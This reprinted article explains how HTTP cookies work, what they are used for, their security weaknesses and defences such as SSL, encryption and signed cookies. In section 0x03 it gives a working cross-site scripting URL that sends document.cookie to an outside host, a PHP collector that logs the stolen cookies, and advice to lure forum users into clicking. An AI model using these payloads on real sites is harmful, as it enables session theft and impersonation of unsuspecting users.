Against this background, this article analyses the technical characteristics of cookies and their security problems, and studies measures to prevent cookies from disclosing users' private information, so as both to protect personal information and to let cookie technology serve Internet applications more securely.
0x01 Cookie Technical Analysis
1.1 Cookie definition and its functions
As defined in Netscape's original specification, a cookie is a way for a server or script to maintain information on the client computer under the HTTP protocol. In plain terms, it is a technique that lets a Web server store a small amount of data on the client's hard disk or in memory and read that data back later. A cookie file is a small text file on the browser's computer, created by a Web server's CGI script while the user browses the site, with a file name of the form username@website[number].txt.
The cookie file records information about the user, such as an identification number (ID), password, pages visited, time spent, how the user shopped on the site, or how many times the user has visited. When the user connects to the Web server again, the browser reads the cookie and passes it back to the site.
Cookie data is stored as "name/value" pairs, and a "name/value" pair is simply a named piece of data. For example, when you visit www.goto.com, the site may create a cookie file on the client computer containing: UserID a9a3bece0563982d www.goto.com/. This is a single name/value pair that GoTo.com placed on the computer, where the name is UserID and the value is a9a3bece0563982d.
Where the cookie file is stored depends on the operating system and browser: on Windows machines they are called cookie files, on the Macintosh MagicCookie files. For Windows with Internet Explorer, the cookie file is stored in the following locations:
Windows 9x: C:\windows\cookies
Windows ME: C:\Windows\profiles\<user name>\cookies
Windows 2000: C:\Windows\Cookies
Windows XP: C:\Documents and Settings\<user name>\cookies
Windows 7 and later: C:\Users\<user name>\AppData\Roaming\Microsoft\Windows\Cookies
The primary function of a cookie is to record the user's personal information, and its most fundamental purpose is to help the Web site save information about the visitor. More generally, a cookie is a way to maintain Web application continuity (that is, execution state management).
HTTP is a stateless, connectionless protocol: the server cannot keep continuous state for a session. As the WWW developed, this statelessness could no longer meet the needs of some applications and made operation awkward for both Web server and client. Against this background a state-management mechanism for HTTP was proposed: the cookie mechanism, a supplement to the HTTP protocol that maintains continuous state between server and client.
1.2 Cookie Basic Working principle
Cookies are carried in HTTP headers. The cookie mechanism defines two headers: Set-Cookie and Cookie. The Set-Cookie header is part of the Web server's response header, and the Cookie header is part of the browser client's request header.
The operation of the cookie mechanism is analysed step by step below.
[Figure: operating process of cookies]
(1) The client types the URL of the Web server in the browser's address bar, and the browser sends a request for the page.
(2) When the server receives the request, it generates a Set-Cookie header, places it in the HTTP response returned to the client, and thereby starts a session.
(3) When the client receives the response, it takes the contents of the Set-Cookie header and stores them in a Cookie.txt file on the client computer so that the session can continue.
(4) When the client requests something from the server again, the browser first searches the computer for that Web site's Cookie.txt. If it is found, a Cookie header is built from it and sent to the server in the HTTP request.
(5) The server receives the request containing the Cookie header, retrieves the user's information from the cookie, and generates a page response for that client. Every page request the browser makes, such as opening or refreshing a page, can carry the existing cookie.
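As an added illustration (not code from the original article) of the exchange in steps (1) to (5), the following Python class keeps a small client-side cookie store: it parses a Set-Cookie response header and later builds the Cookie request header for the same site, leaving out cookies that have expired, belong to another site or path, or are marked Secure when the request is not made over SSL. The domain and cookie values used in the demo are constructed.

```python
import time
from http.cookies import SimpleCookie

# Constructed example: a minimal client-side cookie store. The server answers
# with a Set-Cookie header, the client stores the cookie, and later requests to
# the same site carry it back in a Cookie header.

class CookieStore:
    def __init__(self):
        self.jar = {}   # (domain, cookie name) -> attributes needed to send it back

    def receive(self, domain, set_cookie_header, now=None):
        """Process one Set-Cookie response header received from `domain`."""
        now = time.time() if now is None else now
        parsed = SimpleCookie()
        parsed.load(set_cookie_header)
        for name, morsel in parsed.items():
            expires = None
            if morsel["max-age"]:
                expires = now + int(morsel["max-age"])
            self.jar[(domain, name)] = {
                "value": morsel.value,
                "path": morsel["path"] or "/",
                "secure": bool(morsel["secure"]),   # True only if the Secure flag was set
                "expires": expires,
            }

    def cookie_header(self, domain, path="/", https=False, now=None):
        """Build the Cookie request header for a request to domain/path."""
        now = time.time() if now is None else now
        parts = []
        for (cookie_domain, name), c in self.jar.items():
            if cookie_domain != domain or not path.startswith(c["path"]):
                continue                  # belongs to another site or path
            if c["expires"] is not None and c["expires"] <= now:
                continue                  # expired cookies are no longer sent
            if c["secure"] and not https:
                continue                  # Secure cookies travel only over SSL
            parts.append(name + "=" + c["value"])
        return "; ".join(parts)

if __name__ == "__main__":
    store = CookieStore()
    # steps (2) and (3): the server's Set-Cookie is stored on the client
    store.receive("www.goto.com", "UserID=a9a3bece0563982d; Path=/; Max-Age=3600; Secure")
    # step (4): a later request to the same site carries the Cookie header
    print(store.cookie_header("www.goto.com", https=True))    # UserID=a9a3bece0563982d
    print(repr(store.cookie_header("www.goto.com")))          # '' (Secure cookie, no SSL)
```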
0x02 Cookie Application
(1) Implement user authentication in the Web
One of the big drawbacks of HTTP is that it does not identify the user, which is a great inconvenience for programmers; cookies make up for this flaw. Most sites use the cookie mechanism for user authentication, so that after the first login the user no longer has to enter the account name, password and so on, which saves the user a tedious login each time.
(2) Customizing the personalized Space
Cookie technology facilitates the Web site to customize information for different users, to provide users with a personalized, more user-friendly browsing environment, and to more accurately collect visitor information. For example, to provide users with the right to change the content, layout and color of the Web page, allow users to enter their own information, and then through the information on the site to modify some parameters to customize the appearance of the Web page.
In addition, because of cost, bandwidth constraints and other reasons, users do not want to browse all of a site's content on every visit. With cookies, a site can arrange its sections according to personal preference and dynamically generate the content a user needs, catering to users' different interests, reducing the number of choices a user has to make, and using the Web server's bandwidth more sensibly.
(3) Website access statistics
Because of proxies, caches and the like, the only reliable way to count visitors accurately is to create a unique ID for each visitor. With cookies, a site can determine how many people have visited, how many of them are new and how many returning, and how often a given user visits.
The basic approach relies on a back-end database: when a user visits the site for the first time, the site creates a new ID in the database and sends it to the user in a cookie. On each later visit the site adds 1 to that ID's counter, which yields the user's visit count and tells whether the user is new or returning.
The following program, written in ASP (JScript), counts how many times the user has accessed the page:
<%@ LANGUAGE=JScript %>
<%
var count = Request.Cookies("CountNumber");   // previous count; empty on the first visit
count = (parseInt(count, 10) || 0) + 1;       // parseInt("") is NaN, so start from 0
Response.Cookies("CountNumber") = count.toString();
%>
(4) Maintenance of online e-commerce customer information
Online ordering businesses use cookies to record the items a user wants to buy. The user places items in the "shopping cart", and the site records them under the user's ID in the database. When the user "pays", the site retrieves all of the user's choices from the database by ID and so knows what is in the "shopping cart". Cookies simplify ordering and bring online shopping closer to real life.
(5) Recording site tracks
When you visit the same Web site again, the values stored in its cookie can be read back. This is used to implement many features, such as showing how many times the user has visited a page, the user's last access time, or the user's previous choices on the page, without complex CGI programming.
0x03 Security issues with cookies
Cookies are designed to be convenient for users and to add value to a Web site, and generally do not pose a serious security threat. A cookie file cannot be executed as code and does not carry viruses; it belongs to the user and can only be read by the server that created it. In addition, browsers generally allow only 300 cookies in total, at most 20 per site, and at most 4KB per cookie, so cookies cannot fill the hard disk and cannot be used as a denial-of-service vector.
However, as a substitute for the user's identity, the security of the cookie sometimes determines the security of the whole system, and the security of the cookie cannot be neglected.
(1) Cookie spoofing
A cookie records information such as the user's account ID and password, and this information is usually processed with MD5 before being sent over the network. Once processed in this way, even someone with bad intentions who intercepts it on the network cannot read it. The problem, however, is that the person who intercepts the cookie does not need to understand the meaning of these strings: as long as the cookie is submitted to the server and passes authentication, the interceptor can impersonate the victim to the site. This behaviour is called cookie spoofing.
Through cookie spoofing an illegal user obtains the corresponding encryption key and thereby gains access to the legitimate user's personalised information, including e-mail and even account details, causing serious harm to personal information.
(2) Cookie interception
Cookies are transmitted in plain text between browser and server and are easily intercepted and misused. Anyone who can intercept the Web traffic can read the cookie.
If a cookie is intercepted by an illegal user and replayed within its validity period, that user enjoys the rights of the legitimate user. For example, an illegal user could read pay-to-read e-magazines online without paying.
Cookies can be intercepted in the following ways.
(1) Interception of cookies by programming
The method is completed in two steps. Step one: locate the Web site whose cookies are to be collected, analyse it, and construct the URL. First open the site, assumed here to be http://www.XXX.net, log in with the user name "<Al>" (without quotation marks), and analyse the packet; the following is obtained:
http://www.XXX.net/tXl/login/login.pl?Username=<Al>&passwd=&ok.x=28&ok.y=6
Replace "<Al>" with "<script>alert(document.cookie)</script>" and retry. If this executes successfully, construct the URL:
http://www.XXX.net/tXl/login/login.pl?Username=<script>window.open("http://www.cbifamily.org/cbi.php?"%2bdocument.cookie)</script>&passwd=&ok.x=28&ok.y=6
Where http://www.cbifamily.org/cbi.php is a script on a host that the user can control. It is important to note that "%2b" is the URL encoding for the symbol "+" because "+" is treated as a space. The URL can be posted in a forum to entice others to click.
Step two: write a PHP script that collects the cookies and place it on a Web site that the user can control; the script runs when an unsuspecting person clicks the constructed URL. Its contents are as follows:
<?php
$info = getenv("QUERY_STRING");           // the cookie arrives appended to the query string
if ($info) {
    $fp = fopen("info.txt", "a");         // append it to a log file on the controlled host
    fwrite($fp, $info . "\n");
    fclose($fp);
}
header("Location: http://www.XXX.net/");  // the redirect target is cut off in the source; the site from step one is assumed
?>
By putting this code on the Web, you can collect everyone's cookies. If a forum allows HTML code or allows the use of flash tags, you can use these techniques to collect cookies into the forum, then give the post an appealing theme, write interesting content, and quickly collect a large number of cookies. In the forum, many people's passwords are stolen by this method.
(2) Use of hidden Flash code to intercept cookies. Flash has a getURL() function with which a Flash movie can automatically open a specified Web page, which may lead the user to a site containing malicious code. For example, while a user watches a Flash animation on a computer, code in an animation frame may quietly have connected to the Internet and opened a tiny page with special code that collects cookies and can do other harmful things. The Web site cannot prevent this, since it is an internal function of the Flash file.
(3) Cookie leaks network privacy
0x04 Security measures to protect against cookie leaks
How can cookies be safely applied in the face of cookie security issues?
(1) Strengthen the awareness of safety precautions
Store only unimportant data in cookies, such as user preferences or other information that has no significant impact on the application. If sensitive information must be saved in a cookie, encrypt it so that others cannot steal it. A cookie's attributes can also be set so that it is transferred only over a connection that uses Secure Sockets Layer (SSL). SSL does not stop a cookie stored on the user's computer from being read or altered by others, but it does prevent the cookie from being intercepted in transit.
(2) Configuring a secure browser
(3) Installing the cookie management tool
(4) Delete the in-memory cookies
Some cookie information is not stored as a file on the hard disk but is kept in memory. Such cookies are usually generated automatically in memory when the user visits certain special Web sites, and the system removes them from memory once the visitor leaves the site. To delete them, use Registry Editor to modify the system settings: run Regedit and find the following key:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\SpecialPaths\Cookies. This is the key for in-memory cookies; delete it by right-clicking Cookies, clicking Delete on the shortcut menu, and confirming the deletion.
(5) Using AAS technology
In 2002, the US company Ingrian Networks published a platform, Active Application Security (AAS), that protects a Web site against "cookie poisoning" (cookie tampering) attacks. The AAS platform encrypts the important information inside the cookie and attaches an electronic signature. Each time the Web server communicates with the client, it uses the signature to verify the cookie's contents. If a malicious user deletes the signature or changes the content, the signature no longer matches the cookie content; AAS then blocks the cookie and refuses to return information to the Web site. In addition, the platform encrypts the cookie content with 3DES, and decryption requires a password, so the cookie is stored securely. Communication between the WWW server and the client also uses an SSL connection to secure the communication path. Combining electronic signatures, encryption, SSL connections and other techniques into one scheme removes the vulnerabilities on both the communication path and in data storage, and eliminates alteration of cookies.
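As an added example (not code from the article or from the AAS product), the following Python code shows the signing and verification step that measures (1) and (5) describe: the server serializes the session data with an expiry, appends a signature computed with a server-only key, and recomputes it on every request, so a cookie whose content or signature was altered, or which is replayed after its validity period, is rejected. HMAC-SHA256 stands in for the article's electronic signature; SERVER_KEY and the session values are constructed, and the HttpOnly flag in the Set-Cookie header is an addition not mentioned in the article.

```python
import base64
import hashlib
import hmac
import json
import time

# Constructed example: signed session cookies. SERVER_KEY is an assumed secret
# that exists only on the server, so a client that alters the payload cannot
# produce a matching tag. HMAC-SHA256 plays the role of the electronic signature.
SERVER_KEY = b"assumed-server-only-secret-change-me"

def b64(data):
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def unb64(text):
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))

def make_cookie(session, ttl, now=None):
    """Serialize `session` with an expiry time and append an HMAC-SHA256 tag."""
    now = time.time() if now is None else now
    payload = b64(json.dumps({"d": session, "exp": int(now) + ttl}).encode())
    tag = b64(hmac.new(SERVER_KEY, payload.encode(), hashlib.sha256).digest())
    return payload + "." + tag

def read_cookie(cookie, now=None):
    """Return the session dict, or None if the cookie is malformed, altered or expired."""
    now = time.time() if now is None else now
    try:
        payload, tag = cookie.split(".", 1)
        received = unb64(tag)
    except ValueError:                                  # no separator or undecodable tag
        return None
    expected = hmac.new(SERVER_KEY, payload.encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(received, expected):     # constant-time comparison
        return None                                     # content or signature was altered
    body = json.loads(unb64(payload))
    if body["exp"] <= now:
        return None                                     # replay after the validity period
    return body["d"]

def set_cookie_header(value):
    """Set-Cookie header: sent only over SSL/TLS (Secure) and hidden from page scripts (HttpOnly)."""
    return "session=" + value + "; Path=/; Secure; HttpOnly"

if __name__ == "__main__":
    cookie = make_cookie({"uid": 42}, ttl=3600)
    print(set_cookie_header(cookie))
    print(read_cookie(cookie))                          # {'uid': 42}
    tampered = "XXXX" + cookie[4:]                      # alter the payload, keep the tag
    print(read_cookie(tampered))                        # None
```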
0x05 Concluding remarks
A cookie is a small amount of information sent by a Web server and stored on the client system for later queries. Its primary purpose is to store information, mainly the user's identifier and password and the user's preferences for all possible settings. From a programming point of view, cookies solve the state-management problem.
If the information is not linked to personal data, a cookie is relatively harmless. However, cookies can be used to track users, and problems such as cookie spoofing and disclosure of privacy can threaten the information security of network users.
Raising awareness of prevention, understanding the inherent security weaknesses of cookies, configuring a secure browser, using cookie management tools, and encrypting and transferring cookie data with technologies such as electronic signatures, encryption and SSL connections can effectively prevent cookies from disclosing users' privacy, protect personal information, and let cookies serve Web applications more securely.
Although cookie technology is controversial, it will not die out; better security technology is needed to perfect and develop it. Cookie technology will have greater room to survive and grow in the future.
[Reprint] Talk about cookies